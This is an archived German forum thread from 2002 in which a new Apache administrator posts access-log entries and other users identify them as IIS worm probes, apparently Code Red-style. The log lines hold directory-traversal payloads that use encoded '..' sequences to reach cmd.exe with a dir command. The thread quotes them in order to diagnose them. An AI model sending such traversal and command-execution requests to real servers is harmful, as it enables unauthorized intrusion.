PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : apache logfiles



isaac
13.07.02, 23:04
Hallo Leute
hab mal meine apache serverangekurbelt. Und schon nach 10 min muss ich seltsame einträge in den logfiles vernehmen
hier mal einer aus access_log

p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:43 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 312
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:44 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 310
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:46 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:47 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:48 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:49 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:51 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:52 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:53 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
80.129.170.229 - - [13/Jul/2002:18:24:54 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:54 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:55 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
80.129.170.229 - - [13/Jul/2002:18:24:55 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 317
80.129.170.229 - - [13/Jul/2002:18:24:56 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 317
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:57 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
p5081aae5.dip.t-dialin.net - - [13/Jul/2002:18:24:58 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334

kann mir jemand sagen was dort vesucht wurde
danke isaac

Harry
13.07.02, 23:23
Hallo,

das schaut so aus, als hätte da ein virenverseuchter IIS versucht, seine Viren auf Deinem Webserver zu verbreiten ... Code Red beispielsweise (soweit ich mich erinnere) erzeugt genau solche Meldungen.

Dein Apache ist jedoch gegen diese Viren immun - also keine Sorge ;)

Harry

isaac
13.07.02, 23:28
puh:)
dachte schon ich mus mir sorgen machen.
kannst du mir vielleicht etwas mehr über diesen virus erzählen?

BeaTtheMeaT666
13.07.02, 23:44
der code red befällt IIS, den M$-webserver und ändert soviel ich weiß die website, die der server anbietet durch ein seite mit der meldung "hacked by chinese".

weiterhin startet er von allen infizierten server zu einem bestimmten Zeitpunkr eine Denial of Service Attacke gegen die Domain www.whitehouse.gov (eigentlich witzige idee ;) ).
Aber die admins vom weißen Haus haben einfach die IP der Domain geändert, und somit richtet er im end-effekt keinen weiteren schaden an.


wenn du mehr wissen willst, guck öfter mal auf:

www.cert.org